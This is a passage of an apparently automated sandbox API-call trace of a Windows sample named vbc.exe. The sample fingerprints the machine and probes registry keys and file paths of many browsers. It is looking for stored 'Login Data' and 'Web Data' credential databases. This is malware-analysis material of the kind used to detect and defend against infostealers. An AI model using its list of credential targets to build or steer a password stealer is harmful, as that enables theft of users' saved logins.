(lpLibFileName="WS2_32.dll") returned 0x75e90000 [0165.113] GetProcAddress (hModule=0x75e90000, lpProcName="getaddrinfo") returned 0x75ea55c0 [0165.113] GetProcAddress (hModule=0x75e90000, lpProcName="freeaddrinfo") returned 0x75ea5ee0 [0165.113] GetProcAddress (hModule=0x75e90000, lpProcName=0x3) returned 0x75e9ead0 [0165.113] GetProcAddress (hModule=0x75e90000, lpProcName=0x73) returned 0x75e96520 [0165.114] GetProcAddress (hModule=0x75e90000, lpProcName=0x17) returned 0x75e9e6b0 [0165.114] GetProcAddress (hModule=0x75e90000, lpProcName=0x13) returned 0x75ea1b90 [0165.114] GetProcAddress (hModule=0x75e90000, lpProcName=0x10) returned 0x75ea1d20 [0165.114] GetProcAddress (hModule=0x75e90000, lpProcName=0x4) returned 0x75ea6090 [0165.114] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74530000 [0165.115] GetProcAddress (hModule=0x74530000, lpProcName="GetProcessHeap") returned 0x74547710 [0165.115] GetProcAddress (hModule=0x74530000, lpProcName="HeapFree") returned 0x74541ba0 [0165.115] GetProcAddress (hModule=0x74530000, lpProcName="HeapAlloc") returned 0x77292bd0 [0165.115] GetProcAddress (hModule=0x74530000, lpProcName="SetLastError") returned 0x74542af0 [0165.115] GetProcAddress (hModule=0x74530000, lpProcName="GetLastError") returned 0x74543870 [0165.115] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76b10000 [0165.168] GetProcAddress (hModule=0x76b10000, lpProcName="CoCreateInstance") returned 0x76e20060 [0165.168] GetProcAddress (hModule=0x76b10000, lpProcName="CoInitialize") returned 0x76b41930 [0165.168] GetProcAddress (hModule=0x76b10000, lpProcName="CoUninitialize") returned 0x76df92a0 [0165.168] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x743f0000 [0165.174] GetProcAddress (hModule=0x743f0000, lpProcName=0x8) returned 0x74402590 [0165.175] GetProcAddress (hModule=0x743f0000, lpProcName=0x6) returned 0x74409d40 [0165.175] GetProcAddress (hModule=0x743f0000, lpProcName=0x2) returned 0x74409c90 [0165.175] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x65eb0000 [0167.135] GetProcAddress (hModule=0x65eb0000, lpProcName="atexit") returned 0x65ecc544 [0167.135] atexit (param_1=0x1ed0920) returned 0 [0167.154] GetCommandLineW () returned="\"C:\\Users\\Public\\vbc.exe\" " [0167.155] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0167.405] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\Public\\vbc.exe\" ", pNumArgs=0x19fc24 | out: pNumArgs=0x19fc24) returned 0x866c70*="C:\\Users\\Public\\vbc.exe" [0167.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.407] StrStrW (lpFirst="C:\\Users\\Public\\vbc.exe", lpSrch="-u") returned 0x0 [0167.408] SetErrorMode (uMode=0x3) returned 0x0 [0167.410] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x743f0000 [0167.410] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x75e90000 [0167.411] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x76b10000 [0167.419] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fa24 | out: lpWSAData=0x19fa24) returned 0 [0167.462] GetProcessHeap () returned 0x840000 [0167.462] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x86e3c8 [0167.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0167.464] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fb84 | out: phkResult=0x19fb84*=0x198) returned 0x0 [0167.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0167.465] RegQueryValueExA (in: hKey=0x198, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x86e3c8, lpcbData=0x19fb80*=0x208 | out: lpType=0x0, lpData=0x86e3c8*=0x30, lpcbData=0x19fb80*=0x25) returned 0x0 [0167.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0167.467] RegCloseKey (hKey=0x198) returned 0x0 [0167.467] GetProcessHeap () returned 0x840000 [0167.467] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x865750 [0167.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0167.497] CryptAcquireContextW (in: phProv=0x19fb64, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19fb64*=0x8650c8) returned 1 [0167.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0167.522] CryptCreateHash (in: hProv=0x8650c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x19fb68 | out: phHash=0x19fb68) returned 1 [0167.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0167.525] CryptHashData (hHash=0x866cf0, pbData=0x86e3c8, dwDataLen=0x24, dwFlags=0x0) returned 1 [0167.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0167.527] CryptGetHashParam (in: hHash=0x866cf0, dwParam=0x2, pbData=0x865750, pdwDataLen=0x19fb60, dwFlags=0x0 | out: pbData=0x865750, pdwDataLen=0x19fb60) returned 1 [0167.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0167.529] CryptDestroyHash (hHash=0x866cf0) returned 1 [0167.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0167.530] CryptReleaseContext (hProv=0x8650c8, dwFlags=0x0) returned 1 [0167.530] GetProcessHeap () returned 0x840000 [0167.530] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x31) returned 0x866a70 [0167.530] GetProcessHeap () returned 0x840000 [0167.530] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x865750 | out: hHeap=0x840000) returned 1 [0167.531] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x866a70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0167.531] GetProcessHeap () returned 0x840000 [0167.531] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x42) returned 0x86d388 [0167.531] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x866a70, cbMultiByte=-1, lpWideCharStr=0x86d388, cchWideChar=33 | out: lpWideCharStr="B7274519EDDE9BDC8AE51348A4AEC640") returned 33 [0167.531] GetProcessHeap () returned 0x840000 [0167.531] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x64) returned 0x8650c8 [0167.531] GetProcessHeap () returned 0x840000 [0167.531] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86d388 | out: hHeap=0x840000) returned 1 [0167.531] GetProcessHeap () returned 0x840000 [0167.531] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x866a70 | out: hHeap=0x840000) returned 1 [0167.532] GetProcessHeap () returned 0x840000 [0167.532] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86e3c8 | out: hHeap=0x840000) returned 1 [0167.532] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="B7274519EDDE9BDC8AE51348") returned 0x19c [0167.532] GetLastError () returned 0x0 [0167.532] GetProcessHeap () returned 0x840000 [0167.532] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1388) returned 0x86f220 [0167.532] GetProcessHeap () returned 0x840000 [0167.532] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x8657b0 [0167.556] GetProcessHeap () returned 0x840000 [0167.556] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8705b0 [0167.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.557] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Firefox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x8705b0, pcbData=0x19f840*=0x104 | out: pdwType=0x0, pvData=0x8705b0, pcbData=0x19f840*=0x104) returned 0x2 [0167.584] GetProcessHeap () returned 0x840000 [0167.584] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8705b0 | out: hHeap=0x840000) returned 1 [0167.584] GetProcessHeap () returned 0x840000 [0167.584] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8705b0 [0167.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.585] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\ComodoGroup\\IceDragon\\Setup", pszValue="SetupPath", pdwType=0x0, pvData=0x8705b0, pcbData=0x19f850*=0x104 | out: pdwType=0x0, pvData=0x8705b0, pcbData=0x19f850*=0x104) returned 0x2 [0167.585] GetProcessHeap () returned 0x840000 [0167.585] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8705b0 | out: hHeap=0x840000) returned 1 [0167.595] GetProcessHeap () returned 0x840000 [0167.595] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8705b0 [0167.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.596] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Apple Computer, Inc.\\Safari", pszValue="InstallDir", pdwType=0x0, pvData=0x8705b0, pcbData=0x19f844*=0x104 | out: pdwType=0x0, pvData=0x8705b0, pcbData=0x19f844*=0x104) returned 0x2 [0167.627] GetProcessHeap () returned 0x840000 [0167.627] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8705b0 | out: hHeap=0x840000) returned 1 [0167.627] GetProcessHeap () returned 0x840000 [0167.627] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8705b0 [0167.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.628] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\K-Meleon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x8705b0, pcbData=0x19f84c*=0x104 | out: pdwType=0x0, pvData=0x8705b0, pcbData=0x19f84c*=0x104) returned 0x2 [0167.629] GetProcessHeap () returned 0x840000 [0167.629] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8705b0 | out: hHeap=0x840000) returned 1 [0167.631] GetProcessHeap () returned 0x840000 [0167.631] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8705b0 [0167.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.632] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\mozilla.org\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x8705b0, pcbData=0x19f834*=0x104 | out: pdwType=0x0, pvData=0x8705b0, pcbData=0x19f834*=0x104) returned 0x2 [0167.632] GetProcessHeap () returned 0x840000 [0167.632] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8705b0 | out: hHeap=0x840000) returned 1 [0167.632] GetProcessHeap () returned 0x840000 [0167.632] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8705b0 [0167.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.633] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x8705b0, pcbData=0x19f834*=0x104 | out: pdwType=0x0, pvData=0x8705b0, pcbData=0x19f834*=0x104) returned 0x2 [0167.634] GetProcessHeap () returned 0x840000 [0167.634] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8705b0 | out: hHeap=0x840000) returned 1 [0167.634] GetProcessHeap () returned 0x840000 [0167.634] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8705b0 [0167.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.635] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Flock", pszValue="CurrentVersion", pdwType=0x0, pvData=0x8705b0, pcbData=0x19f84c*=0x104 | out: pdwType=0x0, pvData=0x8705b0, pcbData=0x19f84c*=0x104) returned 0x2 [0167.635] GetProcessHeap () returned 0x840000 [0167.635] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8705b0 | out: hHeap=0x840000) returned 1 [0167.635] GetProcessHeap () returned 0x840000 [0167.635] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x86e3c8 [0167.649] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0167.650] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x86e3c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0167.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.659] StrStrW (lpFirst="C:\\Program Files (x86)", lpSrch="(x86)") returned="(x86)" [0167.660] GetProcessHeap () returned 0x840000 [0167.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x8709b8 [0167.661] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x8709b8, nSize=0x104 | out: lpDst="C:\\Program Files") returned 0x11 [0167.661] GetProcessHeap () returned 0x840000 [0167.661] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6a) returned 0x870bc8 [0167.662] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.663] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\NETGATE\\Black Hawk", arglist=0x19f85c | out: param_1="C:\\Program Files\\NETGATE\\Black Hawk") returned 35 [0167.663] GetProcessHeap () returned 0x840000 [0167.663] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4a) returned 0x861ea8 [0167.663] GetProcessHeap () returned 0x840000 [0167.663] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.664] PathFileExistsW (pszPath="C:\\Program Files\\NETGATE\\Black Hawk") returned 0 [0167.665] GetProcessHeap () returned 0x840000 [0167.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861ea8 | out: hHeap=0x840000) returned 1 [0167.665] GetProcessHeap () returned 0x840000 [0167.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8709b8 | out: hHeap=0x840000) returned 1 [0167.666] GetProcessHeap () returned 0x840000 [0167.666] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3fcc) returned 0x8709b8 [0167.666] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.667] wvsprintfW (in: param_1=0x8709b8, param_2="%s\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}", arglist=0x19f864 | out: param_1="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 90 [0167.667] GetProcessHeap () returned 0x840000 [0167.667] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb8) returned 0x874990 [0167.667] GetProcessHeap () returned 0x840000 [0167.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8709b8 | out: hHeap=0x840000) returned 1 [0167.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.668] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 0 [0167.668] GetProcessHeap () returned 0x840000 [0167.669] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874990 | out: hHeap=0x840000) returned 1 [0167.674] GetProcessHeap () returned 0x840000 [0167.674] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x8709b8 [0167.675] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0167.675] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x8709b8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0167.717] GetProcessHeap () returned 0x840000 [0167.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0167.718] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.719] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 78 [0167.719] GetProcessHeap () returned 0x840000 [0167.719] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa0) returned 0x8635c8 [0167.719] GetProcessHeap () returned 0x840000 [0167.719] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.721] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 0 [0167.721] GetProcessHeap () returned 0x840000 [0167.721] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8635c8 | out: hHeap=0x840000) returned 1 [0167.721] GetProcessHeap () returned 0x840000 [0167.721] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0167.722] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.723] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 76 [0167.723] GetProcessHeap () returned 0x840000 [0167.723] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x9c) returned 0x863520 [0167.723] GetProcessHeap () returned 0x840000 [0167.723] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.724] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 0 [0167.725] GetProcessHeap () returned 0x840000 [0167.725] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x863520 | out: hHeap=0x840000) returned 1 [0167.725] GetProcessHeap () returned 0x840000 [0167.725] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0167.725] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.727] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 59 [0167.727] GetProcessHeap () returned 0x840000 [0167.727] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x874b30 [0167.727] GetProcessHeap () returned 0x840000 [0167.727] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.728] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 0 [0167.728] GetProcessHeap () returned 0x840000 [0167.728] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0167.728] GetProcessHeap () returned 0x840000 [0167.728] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0167.729] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.730] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 67 [0167.730] GetProcessHeap () returned 0x840000 [0167.730] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8a) returned 0x874b40 [0167.730] GetProcessHeap () returned 0x840000 [0167.730] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.731] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 0 [0167.731] GetProcessHeap () returned 0x840000 [0167.731] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0167.731] GetProcessHeap () returned 0x840000 [0167.731] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0167.732] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.733] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 87 [0167.733] GetProcessHeap () returned 0x840000 [0167.733] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb2) returned 0x874b58 [0167.733] GetProcessHeap () returned 0x840000 [0167.734] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.735] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 0 [0167.735] GetProcessHeap () returned 0x840000 [0167.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0167.735] GetProcessHeap () returned 0x840000 [0167.735] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0167.736] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.738] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 85 [0167.738] GetProcessHeap () returned 0x840000 [0167.738] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x874b50 [0167.738] GetProcessHeap () returned 0x840000 [0167.738] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.739] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 0 [0167.740] GetProcessHeap () returned 0x840000 [0167.740] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0167.740] GetProcessHeap () returned 0x840000 [0167.740] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0167.749] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.750] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 68 [0167.750] GetProcessHeap () returned 0x840000 [0167.750] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8c) returned 0x874b30 [0167.750] GetProcessHeap () returned 0x840000 [0167.751] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.752] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 0 [0167.752] GetProcessHeap () returned 0x840000 [0167.752] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0167.752] GetProcessHeap () returned 0x840000 [0167.752] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0167.753] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.754] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 76 [0167.754] GetProcessHeap () returned 0x840000 [0167.754] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x9c) returned 0x8628a8 [0167.754] GetProcessHeap () returned 0x840000 [0167.754] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.755] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 0 [0167.755] GetProcessHeap () returned 0x840000 [0167.755] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8628a8 | out: hHeap=0x840000) returned 1 [0167.755] GetProcessHeap () returned 0x840000 [0167.755] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0167.756] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.756] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 78 [0167.756] GetProcessHeap () returned 0x840000 [0167.756] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa0) returned 0x8628a8 [0167.756] GetProcessHeap () returned 0x840000 [0167.756] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.762] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 0 [0167.763] GetProcessHeap () returned 0x840000 [0167.763] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8628a8 | out: hHeap=0x840000) returned 1 [0167.763] GetProcessHeap () returned 0x840000 [0167.763] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0167.763] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.764] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 76 [0167.764] GetProcessHeap () returned 0x840000 [0167.764] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x9c) returned 0x863328 [0167.764] GetProcessHeap () returned 0x840000 [0167.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.765] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 0 [0167.766] GetProcessHeap () returned 0x840000 [0167.766] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x863328 | out: hHeap=0x840000) returned 1 [0167.766] GetProcessHeap () returned 0x840000 [0167.766] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0167.767] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.767] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 59 [0167.767] GetProcessHeap () returned 0x840000 [0167.767] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x874b30 [0167.767] GetProcessHeap () returned 0x840000 [0167.767] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.768] PathFileExistsW 